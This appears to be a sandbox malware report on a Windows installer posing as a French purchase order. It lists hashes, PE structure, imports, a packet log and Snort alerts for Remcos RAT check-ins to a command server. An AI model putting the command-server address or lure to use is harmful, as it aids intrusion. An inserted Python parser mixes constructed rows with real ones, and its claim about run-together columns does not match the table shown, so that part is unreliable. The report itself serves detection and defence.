                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmzu.................................................................................................................................................................................................................................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.108663972875578
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File size:561'426 bytes
                                                      MD5:edeb34f392872f3c9e220bc9dcf9ba86
                                                      SHA1:e9fb6ff7cd47ec7b08391f4c1ecc1e684bf28ff7
                                                      SHA256:39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d
                                                      SHA512:f33bc39692838cc94ae0ed6aedddfcecb8fd564de6de0d81a258ece57eba04cb7820f1fe834e48b4e0cbce95409449514bb645e69584ad62e0439fea306af424
                                                      SSDEEP:12288:47YvE3TaaFpfEwmgfwwQxeoKGaGsIMcgLvlU2eZysZMNue:bENj7JgaRe0VN9
                                                      TLSH:BBC4DF213764D46BD2022A778954E6CCAB64ED902F2C87537E18BF6F7D2BB4B1CD0261
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@
                                                      Icon Hash:9a8d265b6d2f8141
                                                      Entrypoint:0x403217
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x536FD798 [Sun May 11 20:03:36 2014 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      xor ebx, ebx
                                                      push edi
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 00409130h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [00407034h]
                                                      push 00008001h
                                                      call dword ptr [004070B4h]
                                                      push ebx
                                                      call dword ptr [0040728Ch]
                                                      push 00000008h
                                                      mov dword ptr [00423798h], eax
                                                      call 00007EFCC0C7E672h
                                                      mov dword ptr [004236E4h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041ECA0h
                                                      call dword ptr [00407164h]
                                                      push 004091E4h
                                                      push 00422EE0h
                                                      call 00007EFCC0C7E31Ch
                                                      call dword ptr [004070B0h]
                                                      mov ebp, 00429000h
                                                      push eax
                                                      push ebp
                                                      call 00007EFCC0C7E30Ah
                                                      push ebx
                                                      call dword ptr [00407118h]
                                                      cmp byte ptr [00429000h], 00000022h
                                                      mov dword ptr [004236E0h], eax
                                                      mov eax, ebp
                                                      jne 00007EFCC0C7B8CCh
                                                      mov byte ptr [esp+14h], 00000022h
                                                      mov eax, 00429001h
                                                      push dword ptr [esp+14h]
                                                      push eax
                                                      call 00007EFCC0C7DD9Ah
                                                      push eax
                                                      call dword ptr [00407220h]
                                                      mov dword ptr [esp+1Ch], eax
                                                      jmp 00007EFCC0C7B985h
                                                      cmp cl, 00000020h
                                                      jne 00007EFCC0C7B8C8h
                                                      inc eax
                                                      cmp byte ptr [eax], 00000020h
                                                      je 00007EFCC0C7B8BCh
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x32000 | 0x33488 | .rsrc
                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                       .text | 0x1000 | 0x5be2 | 0x5c00 | 9dfc1bc55ef90dfdde51b4a47a602ee6 | False | 0.669921875 | data | 6.48151554579659 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                       .rdata | 0x7000 | 0x11ce | 0x1200 | 5801d712ecba58aa87d1e7d1aa24f3aa | False | 0.4522569444444444 | OpenPGP Secret Key | 5.236122428806677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .data | 0x9000 | 0x1a7d8 | 0x400 | f1bf988467c2a1fe94575f6d3e66d158 | False | 0.603515625 | data | 4.930453335376689 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                       .ndata | 0x24000 | 0xe000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                       .rsrc | 0x32000 | 0x33488 | 0x33600 | fe27f5d985ec8eb1c83e8de71cfb6fcf | False | 0.4165241027980535 | data | 4.793269294154927 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                       RT_ICON | 0x32448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2289128120194014
                                                       RT_ICON | 0x42c70 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3004256884591129
                                                       RT_ICON | 0x4c118 | 0x8b09 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9878908774197174
                                                       RT_ICON | 0x54c28 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.3189463955637708
                                                       RT_ICON | 0x5a0b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3108762399622107
                                                       RT_ICON | 0x5e2d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.37178423236514524
                                                       RT_ICON | 0x60880 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4214352720450281
                                                       RT_ICON | 0x61928 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5298507462686567
                                                       RT_ICON | 0x627d0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5008196721311475
                                                       RT_ICON | 0x63158 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.5469314079422383
                                                       RT_ICON | 0x63a00 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5184331797235023
                                                       RT_ICON | 0x640c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.43352601156069365
                                                       RT_ICON | 0x64630 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5585106382978723
                                                       RT_DIALOG | 0x64a98 | 0x100 | data | English | United States | 0.5234375
                                                       RT_DIALOG | 0x64b98 | 0x11c | data | English | United States | 0.6056338028169014
                                                       RT_DIALOG | 0x64cb8 | 0xc4 | data | English | United States | 0.5918367346938775
                                                       RT_DIALOG | 0x64d80 | 0x60 | data | English | United States | 0.7291666666666666
                                                       RT_GROUP_ICON | 0x64de0 | 0xbc | data | English | United States | 0.648936170212766
                                                       RT_VERSION | 0x64ea0 | 0x2dc | data | English | United States | 0.47404371584699456
                                                       RT_MANIFEST | 0x65180 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/26/24-07:44:24.601980 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49708 | 29871 | 192.168.2.6 | 193.222.96.21
04/26/24-07:44:24.894704 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49708 | 193.222.96.21 | 192.168.2.6
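The Snort alert rows above and the packet rows that follow were extracted with their port and address columns run together (for example 44349707172.67.191.112192.168.2.6), and such a string has more than one digit-for-digit plausible split. The Python below is an added example, not part of the Joe Sandbox report: it reconstructs the columns by anchoring on the analysis host address 192.168.2.6 (taken from the report) and on the assumption that the analysis VM is Windows, whose ephemeral port range 49152-65535 makes the local port always five digits; it then groups packets into flows and attaches each IDS alert to the flow it belongs to. The four port-443 packet rows are copied from the report; the two rows for the 29871 flow are constructed to match the alert endpoints and are not copied from this report.

```python
import ipaddress
import re
from collections import defaultdict

# Analysis host of this report, taken from the Source IP / Dest IP columns.
LOCAL_IP = "192.168.2.6"
# Assumption: the sandbox VM is Windows, whose ephemeral ports are 49152-65535,
# so the local side of every flow is a five-digit port. That is the anchor that
# makes the run-together "<sport><dport><sip><dip>" field splittable.
EPHEMERAL_RANGE = range(49152, 65536)
EPHEMERAL_DIGITS = 5

PACKET_RE = re.compile(r"^(?P<ts>.+? CEST)(?P<rest>\d[\d.]+)$")
ALERT_RE = re.compile(r"^(?P<ts>\S+?)(?P<proto>TCP|UDP)(?P<sid>\d+)(?P<msg>\D.*?)(?P<rest>[\d.]+)$")


def _is_ipv4(s):
    """True only for a canonical dotted quad (rejects leading zeros and octets > 255)."""
    try:
        return str(ipaddress.IPv4Address(s)) == s
    except ValueError:
        return False


def split_endpoints(rest):
    """Split '<sport><dport><sip><dip>' (no separators) into (sport, dport, sip, dip).

    Every split is enumerated; only those where exactly one address is LOCAL_IP
    and the local port is ephemeral survive, and the answer must be unique.
    """
    candidates = set()
    for k in range(EPHEMERAL_DIGITS + 1, 2 * EPHEMERAL_DIGITS + 1):
        ports, ips = rest[:k], rest[k:]
        if not ports.isdigit():
            break
        for i in range(1, len(ips)):
            sip, dip = ips[:i], ips[i:]
            if not (_is_ipv4(sip) and _is_ipv4(dip)) or (sip == LOCAL_IP) == (dip == LOCAL_IP):
                continue
            if sip == LOCAL_IP:   # outbound row: local (ephemeral) port comes first
                sport, dport = ports[:EPHEMERAL_DIGITS], ports[EPHEMERAL_DIGITS:]
                local, remote = sport, dport
            else:                 # inbound row: local port comes last
                sport, dport = ports[:-EPHEMERAL_DIGITS], ports[-EPHEMERAL_DIGITS:]
                local, remote = dport, sport
            if int(local) in EPHEMERAL_RANGE and 1 <= int(remote) <= 65535 and remote[0] != "0":
                candidates.add((int(sport), int(dport), sip, dip))
    if len(candidates) != 1:
        raise ValueError(f"cannot split {rest!r} unambiguously: {sorted(candidates)}")
    return candidates.pop()


def parse_packet_row(row):
    m = PACKET_RE.match(row.strip())
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    sport, dport, sip, dip = split_endpoints(m["rest"])
    return {"ts": m["ts"], "sport": sport, "dport": dport, "sip": sip, "dip": dip}


def parse_alert_row(row):
    m = ALERT_RE.match(row.strip())
    if not m:
        raise ValueError(f"not an alert row: {row!r}")
    sport, dport, sip, dip = split_endpoints(m["rest"])
    return {"ts": m["ts"], "proto": m["proto"], "sid": int(m["sid"]), "msg": m["msg"],
            "sport": sport, "dport": dport, "sip": sip, "dip": dip}


def flow_key(rec):
    """Direction-independent key: (local port, remote ip, remote port)."""
    if rec["sip"] == LOCAL_IP:
        return (rec["sport"], rec["dip"], rec["dport"])
    return (rec["dport"], rec["sip"], rec["sport"])


def summarize(packet_rows, alert_rows):
    """Count packets per flow and direction, then attach matching IDS alerts."""
    flows = defaultdict(lambda: {"out": 0, "in": 0, "first": None, "last": None, "alerts": []})
    for row in packet_rows:
        rec = parse_packet_row(row)
        f = flows[flow_key(rec)]
        f["out" if rec["sip"] == LOCAL_IP else "in"] += 1
        f["first"] = f["first"] or rec["ts"]
        f["last"] = rec["ts"]
    for row in alert_rows:
        rec = parse_alert_row(row)
        flows[flow_key(rec)]["alerts"].append((rec["sid"], rec["msg"]))
    return dict(flows)


# Copied verbatim from this report's Snort table.
SNORT_ROWS = [
    "04/26/24-07:44:24.601980TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin4970829871192.168.2.6193.222.96.21",
    "04/26/24-07:44:24.894704TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response2987149708193.222.96.21192.168.2.6",
]
PACKET_ROWS = [
    # First four rows copied verbatim from the report's packet table.
    "Apr 26, 2024 07:44:21.031219006 CEST49707443192.168.2.6172.67.191.112",
    "Apr 26, 2024 07:44:21.031259060 CEST44349707172.67.191.112192.168.2.6",
    "Apr 26, 2024 07:44:21.031449080 CEST49707443192.168.2.6172.67.191.112",
    "Apr 26, 2024 07:44:21.042454958 CEST49707443192.168.2.6172.67.191.112",
    # Constructed rows (not from the report) mirroring the two alert endpoints.
    "Apr 26, 2024 07:44:24.601980000 CEST4970829871192.168.2.6193.222.96.21",
    "Apr 26, 2024 07:44:24.894704000 CEST2987149708193.222.96.21192.168.2.6",
]

if __name__ == "__main__":
    for (lport, rip, rport), f in sorted(summarize(PACKET_ROWS, SNORT_ROWS).items()):
        tag = " / ".join(f"sid {sid}: {msg}" for sid, msg in f["alerts"]) or "no IDS alert"
        print(f"{LOCAL_IP}:{lport} <-> {rip}:{rport}  out={f['out']} in={f['in']}  {tag}")
```

Run as a script it prints one line per flow: the 172.67.191.112:443 flow carries no IDS alert, while the 193.222.96.21:29871 flow collects both Remcos signatures. split_endpoints raises instead of guessing when a row admits two valid splits, which is the failure mode you want for evidence you intend to cite in a report.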
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 07:44:21.031219006 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.031259060 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.031449080 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.042454958 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.042469978 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.305634022 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.305830002 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.355596066 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.355644941 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.356511116 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.357466936 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.361473083 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.408118010 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598200083 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598254919 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598315001 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598315001 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598328114 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598351955 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598364115 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598371983 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598406076 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598406076 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598599911 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598645926 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598690033 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598751068 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598763943 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598826885 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598838091 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598898888 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.598908901 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.598956108 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.599358082 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.599423885 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.599471092 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.599517107 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.599526882 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.599582911 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.599594116 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.599657059 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.600167036 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.600229025 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.600239992 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.600300074 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.600310087 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.600394011 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.600452900 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.600466013 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.600532055 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.600984097 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.601036072 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.601047039 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.601217985 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.601269960 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.601280928 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.601450920 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.601898909 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.601965904 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.601975918 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.602032900 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.602037907 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.602050066 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.602119923 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.602147102 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.602209091 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.602799892 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.602864981 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.602894068 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.603054047 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.603106022 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.603108883 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.603120089 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.603163958 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604217052 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604268074 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604279041 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604337931 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604347944 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604418039 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604429007 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604495049 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604556084 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604612112 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604623079 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604679108 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604695082 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604834080 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604882956 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.604895115 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.604947090 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.605689049 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.605761051 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.723579884 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.723674059 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.723700047 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.723841906 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.724041939 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.724097967 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.724419117 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.724482059 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.724692106 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.724757910 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.724936962 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
Apr 26, 2024 07:44:21.724998951 CEST | 49707 | 443 | 192.168.2.6 | 172.67.191.112
Apr 26, 2024 07:44:21.725747108 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.6
